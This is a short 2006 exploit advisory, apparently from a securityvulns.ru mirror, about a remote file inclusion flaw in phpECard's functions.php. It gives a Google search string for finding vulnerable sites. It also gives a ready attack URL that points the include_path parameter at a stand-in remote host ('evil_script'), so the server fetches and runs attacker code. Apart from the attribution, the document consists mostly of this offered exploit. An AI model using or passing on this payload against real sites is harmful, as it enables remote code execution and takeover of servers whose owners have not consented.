Security Advisory: phpECard (functions.php) Remote File Inclusion Exploit

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Vulnerability: ModernBill Insecure CURL Settings
  Уязвимости в CMS WebDirector
  ExBB Italian version <= v2.0 (home_path) Remote File Inclusion Exploit
  MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities

From: Escape_LeAk_(at)_yahoo.com <Escape_LeAk_(at)_yahoo.com>
Date: 30.08.2006
Subject: phpECard (functions.php) Remote File Inclusion Exploit

#================================================================================
==============
# phpECard (functions.php) Remote File Inclusion Exploit
#================================================================================
===============
#
#Critical Level : Dangerous
#
#Venedor site : http://www.quick-xs.net/phpecard/
#
#Google Search: powered by: phpecard

#
#================================================================================
================
#================================================================================
================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/functions.php?include_path=http://evil_script?
#
#
#================================================================================
================
#Discoverd By : LeAk
#
#Conatact : Escape_LeAk[at]yahoo.com
#
# Turkis Hackers
=================================================================================
=================